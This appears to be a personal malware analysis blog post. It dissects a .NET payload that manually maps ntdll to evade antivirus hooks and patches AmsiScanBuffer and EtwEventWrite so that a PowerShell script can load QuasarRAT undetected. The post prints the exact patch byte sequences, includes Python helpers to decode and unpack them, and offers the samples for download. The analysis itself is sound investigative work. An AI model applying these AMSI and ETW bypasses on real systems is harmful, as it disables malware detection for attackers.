The names are readable at least, though the strings are all gibberish and a lot of Win32 API calls appear to have been made dynamically. Lots of Marshal.GetDelegateForFunctionPointer() calls as well. The names of the API calls aren’t visible either:

Looks like it’s obtaining the addresses of API functions from its own process and resolving them to their corresponding function delegates. These delegates and their parameters look familiar – CloseHandle(), VirtualProtect(), CreateFile(), CreateFileMapping(), CopyMemory(), IsWow64Process() etc.

And it’s also got its own GetProcAddress() implementation as smethod_4. In this screenshot, it’s running through the 1634 exports of kernel32.dll whose base address it got from this other method smethod_3 which basically functions as its own version of GetModuleHandle():

And once it arrives at the requested API call (in this case, CloseHandle()), it stops and returns the address:

And it’s got smethod_2 that gives it the address of any exported API function from any library using the results of smethod_3 and smethod_4:

The following static members are delegates or ready-to-use functions for these win32 APIs: kernel32.dll!CloseHandle(), kernel32.dll!FreeLibrary(), kernel32.dll!VirtualProtect(), kernel32.dll!CreateFileA(), kernel32.dll!CreateFileMappingA(), kernel32.dll!MapViewOfFile(), msvcrt.dll!memcpy(), psapi.dll!GetModuleInformation() and kernel32.dll!IsWow64Process():

Oh, and smethod_0 is what resolves the garbage strings to their real forms:

Now, let’s see the Main() method of the program:

It calls smethod_1 with “ntdll.dll” as the parameter (the smethod_0 call resolves the Chinese-looking characters into “ntdll.dll”):

I copied the method into Visual Studio Code and added some comments, since the previously prepared delegates for win32 API functions have been used in this method. I’ve included this code in the “SecondPayload” folder:

I also asked Skype’s Bing chat what this code did:

I also searched the internet for why a program might want to manually map ntdll and came up with some informative articles:

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/

Turns out, it’s an AV evasion technique to avoid falling into the trap of hooks set by antivirus software. Most realtime AV software will place hooks into API functions exported by windows dll files that are commonly used by most programs to inspect the data being passed to these functions and check if anything fishy is going on and stuff like that. If a malware calls any API exported by such a dll say, ntdll.dll, its function calls are going to be intercepted by the AV. So, in a bid to circumvent this “function hooking” set up by AVs, malwares use a trick called “manual mapping” of the required dlls, so that the modified/hooked function exports of the loaded dlls are replaced by a fresh copy mapped directly from their corresponding files on disk. After this step, the malware can safely call any export of the dll and be sure that the AV won’t be privy to this operation.

So, all that smethod_1 is doing is mapping a fresh, unmodified copy of ntdll.dll to its memory. The same thing is being done to kernel32.dll as well, if the OS is Windows 10 or 11 (major version no. > 10) and 64-bit:

Now, line 16 i.e. smethod_0 call looks like following:

The first parameter is “amsi.dll” – a dll file present on Windows OS starting from Windows 10 and it exposes functions for checking if a given buffer contains malicious code. (See AmsiScanBuffer function on MSDN) The second parameter is “AmsiScanBuffer” which is a function exported by amsi.dll. On Windows, when PowerShell is opened, it always loads this dll and calls the aforementioned function to check for malicious payloads when it is executing powershell scripts. The third parameter ‘byte_0’ holds an array of bytes: { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } and the fourth parameter ‘byte_1’ holds { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } which looked like opcodes to me and I asked Skype Bing Chat, to which it replied with astonishing specificity and insight – as if these bytes are always used in association with AmsiScanBuffer patching:

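So, it basically looks like it’s trying to overwrite the start of the AmsiScanBuffer function so that it returns immediately without scanning anything, in both the 32-bit and 64-bit versions of the process. Both patches begin with MOV EAX, 0x80070057, which is the HRESULT E_INVALIDARG; the first then executes a plain RET (64-bit) and the second a RET 0x18 (32-bit stdcall). Because the call reports a failure rather than a detection, callers such as PowerShell end up treating the content as clean. Apparently, “amsi bypass” has been a thing ever since PowerShell-based malware rose to prominence: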

https://blog.f-secure.com/hunting-for-amsi-bypasses/

https://threatresearch.ext.hp.com/disabling-anti-malware-scanning-amsi/

https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux
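The two byte arrays passed for the AmsiScanBuffer patch can also be decoded by hand rather than by asking a chatbot. The following Python sketch is a toy decoder that understands only the three opcodes that occur in these patches (MOV EAX, imm32; RET; RET imm16). `decode_patch` is a hypothetical helper written for this post, not part of any disassembler library.

```python
import struct


def decode_patch(patch: bytes) -> list[str]:
    """Decode the handful of x86/x64 opcodes that appear in these patches."""
    out = []
    i = 0
    while i < len(patch):
        op = patch[i]
        if op == 0xB8:  # MOV EAX, imm32 (immediate is little-endian)
            (imm,) = struct.unpack_from("<I", patch, i + 1)
            out.append(f"mov eax, 0x{imm:08X}")
            i += 5
        elif op == 0xC3:  # RET
            out.append("ret")
            i += 1
        elif op == 0xC2:  # RET imm16 (also pops imm16 bytes of arguments)
            (imm,) = struct.unpack_from("<H", patch, i + 1)
            out.append(f"ret 0x{imm:X}")
            i += 3
        else:
            raise ValueError(f"unhandled opcode 0x{op:02X} at offset {i}")
    return out


byte_0 = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3])
byte_1 = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00])

print(decode_patch(byte_0))  # ['mov eax, 0x80070057', 'ret']
print(decode_patch(byte_1))  # ['mov eax, 0x80070057', 'ret 0x18']
```

0x80070057 is the HRESULT for E_INVALIDARG, so the patched function reports a failed call instead of ever scanning the buffer.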

I would guess that if this .NET payload (which is very small, btw; 15 KB is considered tiny these days) is loaded by a PowerShell script (which runs inside the PowerShell process) via Reflection (Assembly.Load() and whatnot) and invoked (https://stackoverflow.com/questions/23174205/how-can-i-run-an-exe-file-with-assembly-class), the PowerShell process would be defenseless against malicious scripts: even well-known, signatured payloads would fail to be reported, since AmsiScanBuffer would never report a detection.

In my case, where I’m running the payload separately as a debuggee under dnSpy’s debugger, there’s no “amsi.dll” to be found among this process’ modules, as is evident from Process Hacker:

So, the program throws an exception and lands on the catch block at line 44:

Now, the smethod_0 call on line 17 looks like the following:

It’s trying to patch another function, this one exported by ntdll: EtwEventWrite()

Turns out, this function is used to emit Event Tracing for Windows (ETW) events, and the .NET runtime uses it to expose information about the managed assemblies (.NET binaries) that have been loaded into a process. Tools like Process Hacker can see the .NET assemblies loaded in a process because the runtime in each process reports them through EtwEventWrite(). More info can be found all over the internet, but I read this article by Adam Chester and found it really enlightening: https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/

From this article, I also learnt that the previous function patch for amsi.dll also works for managed processes using .NET Framework 4.8 and above, which use amsi.dll’s AmsiScanBuffer() to check for malware when Assembly.Load()’ing a .NET assembly:

More info on this topic is available on the post by Adam Chester I linked above.

Anyway, going back to our EtwEventWrite function patch, the bytes used for patching this time (third and fourth params of smethod_0) are { 0xC3 } and { 0xC2, 0x14, 0x00 }:

0xC3 is obviously a RET, and the 3 bytes in the fourth parameter correspond to RET 0x14, according to Skype Bing Chat:

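As before, the fourth parameter is for patching in a 32-bit process: RET 0x14 also pops the 20 bytes of stdcall arguments off the stack, which a 64-bit function never needs to do, so the plain RET in the third parameter is the 64-bit patch.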
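The operands of the two RET imm16 patches are not arbitrary. Under the 32-bit stdcall convention the callee pops its own arguments, so the operand has to equal the total size of the function's parameters. Here is a small worked check in Python, using parameter sizes taken from the documented prototypes of AmsiScanBuffer and EtwEventWrite; the dictionaries and the `stdcall_cleanup` helper are just illustrative names.

```python
# Parameter sizes in bytes inside a 32-bit process, per the documented prototypes.
AMSI_SCAN_BUFFER = {
    "amsiContext": 4,   # HAMSICONTEXT
    "buffer": 4,        # PVOID
    "length": 4,        # ULONG
    "contentName": 4,   # LPCWSTR
    "amsiSession": 4,   # HAMSISESSION
    "result": 4,        # AMSI_RESULT*
}
ETW_EVENT_WRITE = {
    "RegHandle": 8,        # REGHANDLE is a 64-bit value even on x86
    "EventDescriptor": 4,  # PCEVENT_DESCRIPTOR
    "UserDataCount": 4,    # ULONG
    "UserData": 4,         # PEVENT_DATA_DESCRIPTOR
}


def stdcall_cleanup(params: dict[str, int]) -> int:
    """Bytes the callee must pop on return, i.e. the operand of RET imm16."""
    return sum(params.values())


print(hex(stdcall_cleanup(AMSI_SCAN_BUFFER)))  # 0x18
print(hex(stdcall_cleanup(ETW_EVENT_WRITE)))   # 0x14
```

Both results match the patch bytes, which is a decent sanity check that the RET imm16 variants target the 32-bit builds of these functions.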

So, the second call to smethod_0 is intended to hide the loading of .NET assemblies into a process (typically an unmanaged one, as I gathered from the previous article) so that tools such as Process Hacker, and probably AVs, don’t see which .NET assemblies have been loaded. And of course, this time it succeeds, because ntdll is loaded in all processes:

That’s all this binary does. So, going back to our original powershell script:

Observing lines 48 and 49, it’s clear that the PowerShell instance is going to first execute the second payload for the AMSI and EtwEventWrite bypass and then the actual, first payload, which VirusTotal thought was QuasarRAT. If all had gone well, a PowerShell process would have been running QuasarRAT, and neither Windows Defender nor we would have been any the wiser to the fact that a RAT had been loaded into it.

Some side notes:

-Avira doesn’t consistently detect the second payload. Sometimes it reports the file as clean, and sometimes it flags it as malware and quarantines it.

-I had noticed mouse cursor flickering a week or two prior to this incident and noted down the times:

July 4, 2023: 10:45 AM, 12:56 PM, 1:55 PM, 3:15 PM, 3:45 PM, 4:15 PM

July 6, 2023: 2 PM, 2:45 PM

July 7, 2023: 2:45 PM, 5:15 PM, 5:32 PM

July 11, 2023: 3:45 PM, 4:15 PM, 4:36 PM, 5:15 PM

-I still don’t know what caused the malware to be dropped into %appdata% in the first place.

-I was at first convinced that the file “udgbQ.bat.exe” was the malware but later realized it’s just an x86 PowerShell binary copied from System32.

-The two payloads have been included in the “FirstPayload” and “SecondPayload” folders separately. Each folder contains “output.bin.zip”, which is the Gzipped payload dumped from the PowerShell script and can be extracted using WinRAR/7-Zip. Alternatively, run the decompression part of the PowerShell script and dump the resulting byte arrays to get the actual executable payloads.
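If you'd rather not use an archiver, the Gzipped payloads can also be unpacked with a few lines of Python. This is only a sketch: `unpack_payload` is a hypothetical helper name, the demo below runs on a harmless fake blob instead of the real sample, and the real output.bin.zip should only ever be handled inside an isolated VM.

```python
import gzip


def unpack_payload(gz_bytes: bytes) -> bytes:
    """Decompress a gzip blob and check that the result looks like a PE file."""
    raw = gzip.decompress(gz_bytes)
    if raw[:2] != b"MZ":
        raise ValueError("decompressed data does not start with the MZ header")
    return raw


# Self-contained demo with a fake 'PE' blob (assumption: stands in for the
# bytes you would read from output.bin.zip).
fake_pe = b"MZ" + bytes(62)
blob = gzip.compress(fake_pe)

print(len(unpack_payload(blob)))  # 64
```

The MZ check is just a cheap sanity test that the decompressed bytes are an executable and not some other intermediate stage.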

Download the malware here